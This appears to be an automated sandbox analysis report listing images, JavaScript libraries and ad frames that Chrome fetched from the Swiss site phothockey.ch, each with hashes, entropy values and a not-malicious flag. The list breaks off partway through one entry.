                                                                                                                                            Preview:......Exif..II*...........................V...........^...(.......................i.......f.......H.......H.................0210....................0100................................Z..........C............................."......".$...$.6*&&*6>424>LDDL_Z_||....C............................."......".$...$.6*&&*6>424>LDDL_Z_||.......Z...."................................................................................%........N..YHM7...G...X. ..yG..G(7[..R.U.<.K..#O..-V.nQ.V.+\@(.. V3"!...^...j....U.}.|fO...".........:..h.(.=..GN.........=...|..L2.... +V:.x..A.-Ie7r......4...]..?..Z.b."\....a.....f..4CJ.......bEcb..O......g$4{....6.........................!.A..1Qa."2.Bq.#. 34CSb............?..c..3.E........|.Q...ki...b.5...X.4.=.m9..W..=.Q.#...`YP.m.\.d.U.[.H......H...9.q..V...<.k.x.f.E...#....?......Y...@.f......O&....P"........}..U...B.N.[..fy;A.x]..`.W_..#,]=m.T.%..y.....j..%....q%.........~.U..%.H.n5..4Y$.Tw. ....h.].ji..}.....?...S!.%....3ZT....u.,.J
                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            File Type:ASCII text, with very long lines (2577)
                                                                                                                                            Category:downloaded
                                                                                                                                            Size (bytes):2578
                                                                                                                                            Entropy (8bit):5.177015723485366
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:
                                                                                                                                            MD5:9BB8540493A7FE11B229870EB37BE165
                                                                                                                                            SHA1:D77F17CB9057DC8F622B8C0BF23F6ACB739B3B8E
                                                                                                                                            SHA-256:4A7EE62EB33F3BBB66C2151E5CAC6BF4904E28302EFC36128F3E3CCAE6FDE580
                                                                                                                                            SHA-512:FB245059108EE476BFBCA60A96D401C2796EE44B646E0874D41B5FDB1204A66E3BEC6A4AB8E155E50489B3ADF48BD609683B3D1C020B9F39D084A915F8377773
                                                                                                                                            Malicious:false
                                                                                                                                            Reputation:unknown
                                                                                                                                            URL:https://phothockey.ch/wp-content/plugins/elementor/assets/lib/share-link/share-link.min.js?ver=3.5.6
                                                                                                                                            Preview:(function(a){window.ShareLink=function(b,c){var d,e={},f=function(a){var b=a.substr(0,e.classPrefixLength);return b===e.classPrefix?a.substr(e.classPrefixLength):null},g=function(a){d.on("click",function(){h(a)})},h=function(a){var b="";if(e.width&&e.height){var c=screen.width/2-e.width/2,d=screen.height/2-e.height/2;b="toolbar=0,status=0,width="+e.width+",height="+e.height+",top="+d+",left="+c}var f=ShareLink.getNetworkLink(a,e),g=/^https?:\/\//.test(f),h=g?"":"_self";open(f,h,b)},i=function(){a.each(b.classList,function(){var a=f(this);if(a)return g(a),!1})},j=function(){a.extend(e,ShareLink.defaultSettings,c),["title","text"].forEach(function(a){e[a]=e[a].replace("#","")}),e.classPrefixLength=e.classPrefix.length},k=function(){d=a(b)};(function(){j(),k(),i()})()},ShareLink.networkTemplates={twitter:"https://twitter.com/intent/tweet?text={text}\x20{url}",pinterest:"https://www.pinterest.com/pin/create/button/?url={url}&media={image}",facebook:"https://www.facebook.com/sharer.php?u={u
                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            File Type:JPEG image data, Exif standard: [TIFF image data, little-endian, direntries=6, orientation=upper-left, xresolution=86, yresolution=94, resolutionunit=2], progressive, precision 8, 392x272, components 3
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):24162
                                                                                                                                            Entropy (8bit):7.965747392432299
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:
                                                                                                                                            MD5:280AB366938C1B8DC3652129035C08AC
                                                                                                                                            SHA1:9B55C679CD474DF5A368E7CDB0A38F2802913AC7
                                                                                                                                            SHA-256:4B2980C7EC1239DBCDBCD156F181368164CBD75FE57F22D517B79281688288ED
                                                                                                                                            SHA-512:897536EDE7F7FCEC2407A81C9FDB26647B8174352EC29F4FC1B3751254F61B05E0360EA9C63952635D8C6029329AF275A7A3821FB596CCD83DC5B26AA6324B00
                                                                                                                                            Malicious:false
                                                                                                                                            Reputation:unknown
                                                                                                                                            Preview:......Exif..II*...........................V...........^...(.......................i.......f.......H.......H.................0210....................0100...........................................C............................."......".$...$.6*&&*6>424>LDDL_Z_||....C............................."......".$...$.6*&&*6>424>LDDL_Z_||............"...................................................................................2z.2O..9..4.<.+.n./u[....T..@.'-..IUc&...a.?.E.d.?.s.INe..r..+f@.....'M..T.SZ.n.F.<.o..7Fz.....KA..j..[.i..j'.J6.3.u(H......^&l....T_"....QF...(.....H..yl...Y.R..r..Q>..&.c%QP.........mu..+...9]..4..f...IVK...r.l.......'5...vj6H+..| ..K..LQm.N.9r..MY-..N....:..7^....9..:Q..t.P.......R.7.r1...Xc[.g].%.V*>....#.".........f.8Af...aM..oyn.j...6L.V.IhY...\V...S.#..iC....".........E.#.Kt.rFEsj....l|.V.....t.....h..n....7..kYAe.v..A..%.L.v....|..e32.).:.X{.v&.sd.rYm5.N.g..f....cv:..SH{.h.+.|....i9....V...i.ZA#.}..R.r.h.a.AKCd.nn.*.h...q{.;.u..
                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            File Type:PNG image data, 32 x 32, 8-bit colormap, interlaced
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):1174
                                                                                                                                            Entropy (8bit):7.112521835674739
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:
                                                                                                                                            MD5:2C1F3F77605F576947738095D5FC16C4
                                                                                                                                            SHA1:89D63209FE70AAF31612046B0D725636F82DCFDB
                                                                                                                                            SHA-256:B2F4CA94EF50DA22D2A82AEC1F7513D315F241094BFA8E0E82B402BE5E274A6B
                                                                                                                                            SHA-512:7C79BA837673BE9B6ACE8952647F3C8FC7DD9D3207110AD9B29D6220967BC17E5C0971075A08D253E590E455A73D22F3F62669A77FA1AAE01A8287FA9A39BFC7
                                                                                                                                            Malicious:false
                                                                                                                                            Reputation:unknown
                                                                                                                                            Preview:.PNG........IHDR... ... .....3..P....PLTE...........................................!&.su.Y].....N.......*0$.] .[..T..... ..Q...A.s:.n;.n.;A.:@.AG.9>&.^..U..W..!.aeM.|}.o...os.}..\aF.v.=B5.j6.k1.g1.g.16..lpT......w...w{..6;I.ys..f..M.|E.v.EK.EJ!.[....&+.38,.d#.]. &. &.Y].MSe..Z...Z_.ej.RW..TA.s9.m .[..P".\."(.....O#.].#)....Z..Z..%..$.#(./3(._..U..X..W...%* .Y..[..V....!'..VW..Z..P.~.PU.Z^.LQ=.p..#.!'..X~.....~...fiP...X\.......#q(.....tRNS......... $'DY..%.....pHYs.................eXIfII*...........................V...........^...(.......................i.......f.......H.......H.................0210....................0100.................... ........... .........._....IDATx...Ws.P....^6.D.D..zo..H.L..B..)...b..e!X..\K.a.....s....Yl.\V@..I.....Y..c`x...b. .5......_.....%..w.8.._...w*..N....x....G...7..z..c.4M...L.\.'.8..U..B...J.R....t:...n...@.&^b.o..ja.......ah8g...^.Qs..-K...l..a...;.V2R. .....b!mef.a.u..X.NQ..^.z[".m6.m0......s...........I.....?.y.H.
                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            File Type:JPEG image data, Exif standard: [TIFF image data, little-endian, direntries=6, orientation=upper-left, xresolution=86, yresolution=94, resolutionunit=2], progressive, precision 8, 800x445, components 3
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):49982
                                                                                                                                            Entropy (8bit):7.979921169606221
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:
                                                                                                                                            MD5:3A3C6A1EB4C7498FE8AFD7C31C2F77EB
                                                                                                                                            SHA1:076B4692CCA4268799029ABC43F5BE629EDE3C90
                                                                                                                                            SHA-256:9C1FB11000557CA19ADFB13D7E2E0D9C48DFF56C482840E0674FF1B70BD29E8E
                                                                                                                                            SHA-512:221120B51B211BCD628A3469AAC566AE580A0E808F8106D7B41CA8C39279404EAFDD9AFAD38346B988AC671F454DD688E499435D9826227347B393FD06CA87D3
                                                                                                                                            Malicious:false
                                                                                                                                            Reputation:unknown
                                                                                                                                            Preview:......Exif..II*...........................V...........^...(.......................i.......f.......H.......H.................0210....................0100.................... ......................C...............................!..!..)1(%(1)I9339ITGCGTf[[f.z.......C...............................!..!..)1(%(1)I9339ITGCGTf[[f.z............ .."...............................................................................f...i......E....j3I..h...}..n....9Z.9.C..l..t.i..T,...f.t..).s.oG...f.ty.$.j?I2$N.TY8.e.8...s.....Y!..u.7.y...}.'/.Xi.s..t..v./...h.........+$...b....J.#7e..`.T..>...q.....L. ..!.....q._H"PI...|....g5....l......(J....*.mJ.X..G$..1.A....d;k....AK.BZ..B.t...#7]..u.......B&.Y...%F...<.....O...qew9..G.6\.J......NqS.rJ`..b...|..g..b.7...7j..Z.Q.j.-K.MX..w.n....I..^.J...0S.%M./D..:.]..7I..@..#'..K.......b,.<.m....L..-S.@{+P.n.m.....Y.3G{..2.c]^.4.B;..b.v|.z....*..{.p.u..KzHb..]V..E...k.......-.!-.&4.#...Y.\~?D.J.....=...}..-..5.9..[.rJ...T.U,.
                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            File Type:ASCII text, with very long lines (65280)
                                                                                                                                            Category:downloaded
                                                                                                                                            Size (bytes):139153
                                                                                                                                            Entropy (8bit):5.2146927200642335
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:
                                                                                                                                            MD5:15BB2B8491FC7E84137D65F610E1685A
                                                                                                                                            SHA1:CD76B70A5426893E9C022B9A75C50A7C1348E2D0
                                                                                                                                            SHA-256:B23F49F504FAA32AAC548B6662FFD64412F6738496FAB8BE38DA46C5B7121804
                                                                                                                                            SHA-512:95C05110B29101C84DF71C54172269F478D9CD14965B3DE987613E11E0F1CCF01C1B7D2BF290D97EF11373F24DCCD677F8710E1555D332903181F469D0F2B0BB
                                                                                                                                            Malicious:false
                                                                                                                                            Reputation:unknown
                                                                                                                                            URL:https://phothockey.ch/wp-content/plugins/elementor/assets/lib/swiper/swiper.min.js?ver=5.3.6
                                                                                                                                            Preview:/**. * Swiper 5.3.6. * Most modern mobile touch slider and framework with hardware accelerated transitions. * http://swiperjs.com. *. * Copyright 2014-2020 Vladimir Kharlampidi. *. * Released under the MIT License. *. * Released on: February 29, 2020. */..!function(e,t){"object"==typeof exports&&"undefined"!=typeof module?module.exports=t():"function"==typeof define&&define.amd?define(t):(e=e||self).Swiper=t()}(this,(function(){"use strict";var e="undefined"==typeof document?{body:{},addEventListener:function(){},removeEventListener:function(){},activeElement:{blur:function(){},nodeName:""},querySelector:function(){return null},querySelectorAll:function(){return[]},getElementById:function(){return null},createEvent:function(){return{initEvent:function(){}}},createElement:function(){return{children:[],childNodes:[],style:{},setAttribute:function(){},getElementsByTagName:function(){return[]}}},location:{hash:""}}:document,t="undefined"==typeof window?{document:e,navigator:{userAgent:""},
                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            File Type:ASCII text
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):860
                                                                                                                                            Entropy (8bit):4.213420230142893
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:
                                                                                                                                            MD5:6442171DA4DC4093819153E31FE5D513
                                                                                                                                            SHA1:8B4BB7223CE0E3DDF41FD16AC73430DC847FB69A
                                                                                                                                            SHA-256:6853D729A67593739860D399DC73E21340DE4F57BDA79CC930F536E428967B4F
                                                                                                                                            SHA-512:A6F17F0DCD6183D5C8FAEA966F7AB166603AD0660044637919E44B3DD9A1DDFAE3B36E535DFBD9AB6F61E79268706EA21F5A447920C79DD284D01BF03DB98746
                                                                                                                                            Malicious:false
                                                                                                                                            Reputation:unknown
                                                                                                                                            Preview:jQuery(document).ready(function ($) {. $('.zoom-social_icons-list__link').on({. 'mouseenter': function (e) {. e.preventDefault();.. var $this = $(this).find('.zoom-social_icons-list-span');. var $rule = $this.data('hover-rule');. var $color = $this.data('hover-color');. if ($color !== undefined) {. $this.attr('data-old-color', $this.css($rule));. $this.css($rule, $color);. }. },. 'mouseleave': function (e) {. e.preventDefault();. var $this = $(this).find('.zoom-social_icons-list-span');. var $rule = $this.data('hover-rule');. var $oldColor = $this.data('old-color');. if ($oldColor !== undefined) {. $this.css($rule, $oldColor);. }. }. });.});
                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            File Type:HTML document, ASCII text
                                                                                                                                            Category:downloaded
                                                                                                                                            Size (bytes):143
                                                                                                                                            Entropy (8bit):5.079318363208902
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:
                                                                                                                                            MD5:E4E31B474D3E0B577B3C8856E91F8659
                                                                                                                                            SHA1:A81311F7FCFA9B6B23A24D4E5C976D5F75B1B9B7
                                                                                                                                            SHA-256:18088C10E79C926292732AF98A0CE470E90F3FBCBA4BB4896AB3310C2D94E421
                                                                                                                                            SHA-512:A07961EB39C4CD4E39EE19E2C675E64E5BA5367DAA18E2F76A23772ABD62F46B002E6BE8FB0F35A70616941178FACC8DF579C4A68E5811B74313C12806AAFAE3
                                                                                                                                            Malicious:false
                                                                                                                                            Reputation:unknown
                                                                                                                                            URL:https://googleads.g.doubleclick.net/pagead/drt/s?v=r20120211
                                                                                                                                            Preview:<!DOCTYPE HTML PUBLIC>.<html>. <head>. <meta http-equiv="refresh" content="0;url=https://www.google.com/pagead/drt/ui" />. </head>.</html>
                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            File Type:HTML document, ASCII text, with very long lines (65536), with no line terminators
                                                                                                                                            Category:downloaded
                                                                                                                                            Size (bytes):245346
                                                                                                                                            Entropy (8bit):5.741225757450338
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:
                                                                                                                                            MD5:0CBCD09B17E8977901CECD538E37D188
                                                                                                                                            SHA1:D1A54DCE8C457C1E3E1BFBECCA6EA151F04892F2
                                                                                                                                            SHA-256:6FB26EF3E7D01DE578D15B984E0DE611ADFEAB4AFBC87FA5E209024B19F64079
                                                                                                                                            SHA-512:D9A41533F6293003651242CDEE2A18A21684368A9850716676E73CE8C0D765FBB57895959F5E8830829669905B4C119E19FE92984EAAD048229A9B006678E88A
                                                                                                                                            Malicious:false
                                                                                                                                            Reputation:unknown
                                                                                                                                            URL:https://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-5534394335622311&output=html&adk=1812271804&adf=3025194257&abgtt=6&lmt=1736177769&plat=1%3A16777216%2C2%3A16777216%2C3%3A16%2C4%3A16%2C9%3A32776%2C16%3A8388608%2C17%3A32%2C24%3A32%2C25%3A32%2C30%3A1081344%2C32%3A32%2C41%3A32%2C42%3A32&format=0x0&url=https%3A%2F%2Fphothockey.ch%2F&pra=5&wgl=1&aihb=0&aiof=3&asro=0&ailel=1~2~4~6~7~8~9~10~11~12~13~14~15~16~17~18~19~20~21~24~29~30~34&aiael=1~2~3~4~6~7~8~9~10~11~12~13~14~15~16~17~18~19~20~21~24~29~30~34&aicel=33~38&aifxl=29_18~30_19&aiixl=29_5~30_6&aiict=1&aiapm=0.3221&aiapmi=0.33938&aiombap=1&aief=1&uach=WyJXaW5kb3dzIiwiMTAuMC4wIiwieDg2IiwiIiwiMTE3LjAuNTkzOC4xMzIiLG51bGwsMCxudWxsLCI2NCIsW1siR29vZ2xlIENocm9tZSIsIjExNy4wLjU5MzguMTMyIl0sWyJOb3Q7QT1CcmFuZCIsIjguMC4wLjAiXSxbIkNocm9taXVtIiwiMTE3LjAuNTkzOC4xMzIiXV0sMF0.&dt=1736177761002&bpp=24&bdt=13428&idt=8676&shv=r20241212&mjsv=m202412090101&ptt=9&saldr=aa&abxe=1&cookie_enabled=1&eoidce=1&nras=1&correlator=3928226519857&frm=20&pv=2&u_tz=-300&u_his=1&u_h=1024&u_w=1280&u_ah=984&u_aw=1280&u_cd=24&u_sd=1&dmc=8&adx=-12245933&ady=-12245933&biw=1280&bih=907&scr_x=0&scr_y=0&eid=95349404&oid=2&pvsid=2286212169202884&tmod=1523322118&uas=3&nvt=1&fsapi=1&fc=1920&brdim=0%2C0%2C0%2C0%2C1280%2C0%2C1280%2C984%2C1280%2C907&vis=1&rsz=%7C%7Cs%7C&abl=NS&fu=32768&bc=31&bz=1&td=1&tdf=0&psd=W251bGwsbnVsbCxudWxsLDNd&nt=1&ifi=1&uci=a!1&fsb=1&dtd=8719
                                                                                                                                            Preview:<script>window.sra_later_blocks = [];</script><script>window.sra_later_blocks.push({creative:'\x3c!doctype html\x3e\x3chtml \x3e\x3chead\x3e\x3cstyle\x3e* {margin: 0;padding: 0;outline: none;}body {background: rgba(52, 58, 65, 0.600000);backdrop-filter: blur(15px); /*potential issue: minimal browser support*/-webkit-backdrop-filter: blur(15px); /*for safari*/height: 100%;}#ad_iframe {box-shadow: 0 !important;display: block;left: auto;margin: 0 auto;position: relative;top: auto;}.creative {transition: opacity 1s;-webkit-transition: opacity 1s;position: relative;}#card {background-color: #fff;border-radius: 6px;padding: 0 6px 1px;position: relative;box-shadow: 0px 8px 12px rgba(60, 64, 67, 0.15), 0px 4px 4px rgba(60, 64, 67, 0.3);}html {height: 100%;}.toprow {width: 100%;display: table;height: 24px;background-color: #fff;}.btn {display: table;transition: opacity 1s, background .75s;-webkit-transition: opacity 1s, background .75s;-moz-transition: opacity 1s, background .75s;-o-transition:
                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            File Type:HTML document, ASCII text, with very long lines (1771)
                                                                                                                                            Category:downloaded
                                                                                                                                            Size (bytes):2055
                                                                                                                                            Entropy (8bit):5.274055861163858
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:
                                                                                                                                            MD5:487A3E8453026E142EAE1A42B902666C
                                                                                                                                            SHA1:B7E0EC090A4D98A788C70C1333ADEA294D07027E
                                                                                                                                            SHA-256:FEDF6AF2935E1C30DE75CC8F879CA86BD81DFF8ACCD1C943C8A94440013115FA
                                                                                                                                            SHA-512:4D037D2C46E4D5764AC6C25BAC575CFEA82E8954A71E84D7F5E368BE5C78F2A7236A4486A22888AC2CE4D6AA3FA06DAEC1278C5B41EF88693FD7271CEB424E2A
                                                                                                                                            Malicious:false
                                                                                                                                            Reputation:unknown
                                                                                                                                            URL:https://phothockey.ch/wp-content/themes/colormag-pro/assets/js/fitvids/jquery.fitvids.min.js?ver=4.1.12
                                                                                                                                            Preview:/*!.* FitVids 1.1.*.* Copyright 2013, Chris Coyier - http://css-tricks.com + Dave Rupert - http://daverupert.com.* Credit to Thierry Koblentz - http://www.alistapart.com/articles/creating-intrinsic-ratios-for-video/.* Released under the WTFPL license - http://sam.zoy.org/wtfpl/.*.*/.!function(t){"use strict";t.fn.fitVids=function(e){var i={customSelector:null,ignore:null};if(!document.getElementById("fit-vids-style")){var r=document.head||document.getElementsByTagName("head")[0],a=document.createElement("div");a.innerHTML='<p>x</p><style id="fit-vids-style">.fluid-width-video-wrapper{width:100%;position:relative;padding:0;}.fluid-width-video-wrapper iframe,.fluid-width-video-wrapper object,.fluid-width-video-wrapper embed {position:absolute;top:0;left:0;width:100%;height:100%;}</style>',r.appendChild(a.childNodes[1])}return e&&t.extend(i,e),this.each((function(){var e=['iframe[src*="player.vimeo.com"]','iframe[src*="youtube.com"]','iframe[src*="youtube-nocookie.com"]','iframe[src*="kic
                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            File Type:Unicode text, UTF-8 text, with very long lines (8189)
                                                                                                                                            Category:downloaded
                                                                                                                                            Size (bytes):21464
                                                                                                                                            Entropy (8bit):5.303481082929494
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:
                                                                                                                                            MD5:8FBC22C79D40119DDE9A5D16897002B9
                                                                                                                                            SHA1:E9837519ACA724457792E2D5EE98A97A0367CDF9
                                                                                                                                            SHA-256:7E84C9F8D71BC6EB2DAC2FCE59A6CAEA62DA51FFA8CF56B41806F59386AB1322
                                                                                                                                            SHA-512:3118A198A3710C839C15D6C4B5DC9F9ADCD637913AF2E26F438B01C80B27281F4937E25AAD2817855D8B3EB36207C61AE16D62B17E698799C5316E86F52AC6FC
                                                                                                                                            Malicious:false
                                                                                                                                            Reputation:unknown
                                                                                                                                            URL:https://phothockey.ch/wp-includes/js/jquery/ui/core.min.js?ver=1.13.3
                                                                                                                                            Preview:/*! jQuery UI - v1.13.3 - 2024-04-26.* https://jqueryui.com.* Includes: widget.js, position.js, data.js, disable-selection.js, effect.js, effects/effect-blind.js, effects/effect-bounce.js, effects/effect-clip.js, effects/effect-drop.js, effects/effect-explode.js, effects/effect-fade.js, effects/effect-fold.js, effects/effect-highlight.js, effects/effect-puff.js, effects/effect-pulsate.js, effects/effect-scale.js, effects/effect-shake.js, effects/effect-size.js, effects/effect-slide.js, effects/effect-transfer.js, focusable.js, form-reset-mixin.js, jquery-patch.js, keycode.js, labels.js, scroll-parent.js, tabbable.js, unique-id.js, widgets/accordion.js, widgets/autocomplete.js, widgets/button.js, widgets/checkboxradio.js, widgets/controlgroup.js, widgets/datepicker.js, widgets/dialog.js, widgets/draggable.js, widgets/droppable.js, widgets/menu.js, widgets/mouse.js, widgets/progressbar.js, widgets/resizable.js, widgets/selectable.js, widgets/selectmenu.js, widgets/slider.js, widgets/sort
                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            File Type:RIFF (little-endian) data, Web/P image
                                                                                                                                            Category:downloaded
                                                                                                                                            Size (bytes):3190
                                                                                                                                            Entropy (8bit):7.837524022494474
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:
                                                                                                                                            MD5:3F400AC34C5D9A31490CA7F0232C4F11
                                                                                                                                            SHA1:97AC956B9E85F91BD49196ACDD0EE36F3F48C5EE
                                                                                                                                            SHA-256:53CA817DCDD5F313C291932725BF0848D52C8E1ACA532A408B0C712987124741
                                                                                                                                            SHA-512:CB2DE9569047763756EACC8F6DA08EC758A714B6029B6C77A6B8EF4A4212C8CF674903A22D4E9ED6507E459633EBB665D3A22AFBB0AA71ED3B6B9F78A4141B0A
                                                                                                                                            Malicious:false
                                                                                                                                            Reputation:unknown
                                                                                                                                            URL:https://ml3y3bxxlq19.i.optimole.com/w:130/h:90/q:mauto/rt:fill/g:ce/ig:avif/https://phothockey.ch/wp-content/uploads/2020/11/NQ3A9951.jpg
                                                                                                                                            Preview:RIFFn...WEBPVP8X...........Y..VP8 .........*..Z.>.<.I%."(..<....bjRK..1. .........L....N.0....^.~.....:d..W.....f2......^.^..W._7.......xC.?......%.y...=.zH~....k.5[....kS.rP.L.7.L.g..L~...QM.U.~.'..3.^...n..eC..)..!X....!.O.H.4.F.....x..dl.u....e%..!..x...8"..a..._c.r. .M...9Z..5_..Hd*).U...h{......R. ...`W.!t.|...FTDga.......fub...].....:.H;(a]....y..o.....s..).=...NM.o..t/...x.-l6O.xM...*.y.{.....I...b...9.M.....r..&o.M..gBGg..<.z.0.Jy.x[V.R7.`@....).>q.....x...^!"02,.J...j!.l.Z:.%..&Vx.'E...9^.Z....U2.WwiW,;.T...&.......T.C...."..R.x.N.U..A..&<.._j`}v...........c.j.....7...PN...v.=...w?..n[..&#..9.E...g`..I..R]L..o.../.....E4......<.....J.b.t[Kh...TY..9.8n.9..x.I`tHy..$RD..F...u.U...0..!s..plK |..OYn7w..@..&;..Q..X.G}.d..^.P..C.!>. M.w.R.ot.',s"..3..=9?.3...^..q../K.=.:.........uj....).......T.:.M.U=0..k)..Q.R.H..'..6. g.....c.6...|.".2w.....d.........G.5....~7.|C^....S....mc...oP+...J9/....9.....v........`...>5o......(...wFF..,.*.X.rB.m
                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            File Type:HTML document, ASCII text, with very long lines (65536), with no line terminators
                                                                                                                                            Category:downloaded
                                                                                                                                            Size (bytes):140569
                                                                                                                                            Entropy (8bit):6.12340791980889
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:
                                                                                                                                            MD5:E046370EE2C213668A99BA7CFCCD49BC
                                                                                                                                            SHA1:98EBB2F39A8D2ACE57D47201E7461A6795A5E23A
                                                                                                                                            SHA-256:F4CF6C08CD45708584B7993BD5C928A32D091DE2BD1F2FCECFF6EB9D4929BD59
                                                                                                                                            SHA-512:C70E9D612FCFD55F7D2BCF0061B1DE6D1AF18CA20B9080B179696FD6B31B1566FA996ADD21F31DB3E51B15A611ECF2D2B0206E8F61F66079DF4CA7AF6B21BBC8
                                                                                                                                            Malicious:false
                                                                                                                                            Reputation:unknown
                                                                                                                                            URL:https://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-5534394335622311&output=html&h=280&adk=935936864&adf=3472948460&pi=t.aa~a.1043414356~rp.1&w=1200&abgtt=6&fwrn=4&fwrnh=100&lmt=1736177769&rafmt=1&to=qs&pwprc=9468878717&format=1200x280&url=https%3A%2F%2Fphothockey.ch%2F&fwr=0&pra=3&rpe=1&resp_fmts=3&wgl=1&fa=40&uach=WyJXaW5kb3dzIiwiMTAuMC4wIiwieDg2IiwiIiwiMTE3LjAuNTkzOC4xMzIiLG51bGwsMCxudWxsLCI2NCIsW1siR29vZ2xlIENocm9tZSIsIjExNy4wLjU5MzguMTMyIl0sWyJOb3Q7QT1CcmFuZCIsIjguMC4wLjAiXSxbIkNocm9taXVtIiwiMTE3LjAuNTkzOC4xMzIiXV0sMF0.&dt=1736177761026&bpp=3&bdt=13451&idt=8703&shv=r20241212&mjsv=m202412090101&ptt=9&saldr=aa&abxe=1&cookie_enabled=1&eoidce=1&prev_fmts=0x0&nras=2&correlator=3928226519857&frm=20&pv=1&u_tz=-300&u_his=1&u_h=1024&u_w=1280&u_ah=984&u_aw=1280&u_cd=24&u_sd=1&dmc=8&adx=40&ady=170&biw=1280&bih=907&scr_x=0&scr_y=0&eid=95349404&oid=2&pvsid=2286212169202884&tmod=1523322118&uas=3&nvt=1&fc=1920&brdim=0%2C0%2C0%2C0%2C1280%2C0%2C1280%2C984%2C1280%2C907&vis=1&rsz=%7C%7Cs%7C&abl=NS&fu=128&bc=31&bz=1&td=1&tdf=0&psd=W251bGwsbnVsbCxudWxsLDNd&nt=1&ifi=2&uci=a!2&fsb=1&dtd=8708
                                                                                                                                            Preview:<!DOCTYPE html><html lang=en><head><meta charset="UTF-8"><script>var jscVersion = 'r20241212';</script><script>var google_casm=[];</script><style>HTML,BODY{height:100%;width:100%;margin:0;padding:0;overflow:hidden;}#mys-wrapper{height: 100%;width:100%;overflow:hidden;position: absolute;top:0;left:0;align-items: center;display:flex;justify-content:center;line-height:normal;}#mys-overlay{height:100%;width:100%;overflow:hidden;position:absolute;top:0;left:0;box-sizing:border-box;pointer-events:none;z-index:1;border:1px solid #E5E5E5;}.mys-wrapper A,.mys-wrapper A:visited,.mys-wrapper A:hover,.mys-wrapper A:active{color:inherit;cursor:pointer;text-decoration:inherit;}[dir=rtl] .flip-on-rtl{transform:scale(-1,1);transform-origin:center;}#mys-content{flex-shrink:0;position:relative;overflow:hidden;z-index:0;}</style><style data-nl="bannerB" data-ns="ns-bv9ia" x-phase="assemble">.ns-bv9ia-l-bannerB{opacity:.01;position:absolute;top:0;left:0;display:block;width:1200px;height:280px;}.ns-bv9ia-e
                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            File Type:HTML document, Unicode text, UTF-8 text, with very long lines (583)
                                                                                                                                            Category:downloaded
                                                                                                                                            Size (bytes):5498
                                                                                                                                            Entropy (8bit):5.847347848435852
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:
                                                                                                                                            MD5:D2BB3AE594ACE88EF30EE3829D83F360
                                                                                                                                            SHA1:88FA158D7F7C72D86EFD52A5C16931A14C43E3F2
                                                                                                                                            SHA-256:481BE5E07D25ACC99546733A64F75D59AA6F347C2BC3CCC6233FCAF3EBFFBDFE
                                                                                                                                            SHA-512:0365D2DF7BED810ECA3059D5E7BBF784EDA7B6B88F5C0532BA1A7056F2FCD3C4447A4CBB0FAE818B12D32583916AC7DE8D9FF7DE4D53E5BCA7FCA6945F7DEDD9
                                                                                                                                            Malicious:false
                                                                                                                                            Reputation:unknown
                                                                                                                                            URL:https://mc.yandex.com/metrika/metrika_match.html
                                                                                                                                            Preview:<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">.<html>.<head>. <meta http-equiv="X-UA-Compatible" content="IE=edge">. <meta http-equiv="Content-Type" content="text/html;charset=UTF-8">. <meta name="viewport" content="width=device-width,initial-scale=1">. <style>body {background-color:#EFF2F7;font-family:system-ui,sans-serif;color:#2F3746;}.main{display:flex;flex-direction:column;align-items:center;}button {background-color:#7A45E5;border-radius:14px;cursor:pointer;color:white;border:0;padding:16px 20px;}button:hover {background-color:#8659e0;}h1{font-size:140px;white-space:nowrap;}h3{font-size:32px;text-align:center;}p{max-width:600px;line-height:24px;text-align:center;margin-bottom:32px;}@media (prefers-color-scheme: dark) {body {background-color:#333;color:white;}}@media (max-width: 650px) {h1 {font-size: 60px;}}</style>.</head>.<body>. <div class="main">. <h1 aria-hidden="true">.\_(.)_/.</h1>. <h3>Something
                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            File Type:RIFF (little-endian) data, Web/P image
                                                                                                                                            Category:downloaded
                                                                                                                                            Size (bytes):36470
                                                                                                                                            Entropy (8bit):7.992938388170349
                                                                                                                                            Encrypted:true
                                                                                                                                            SSDEEP:
                                                                                                                                            MD5:E881732525DE66C45C74ACFDD9637BBF
                                                                                                                                            SHA1:F77E3384F36828C11180D7EA491B7B5E31972C51
                                                                                                                                            SHA-256:5F854E68D8AA1274E9596D837CE135999CDBC86E72A732C147D00BBCCD2CCA36
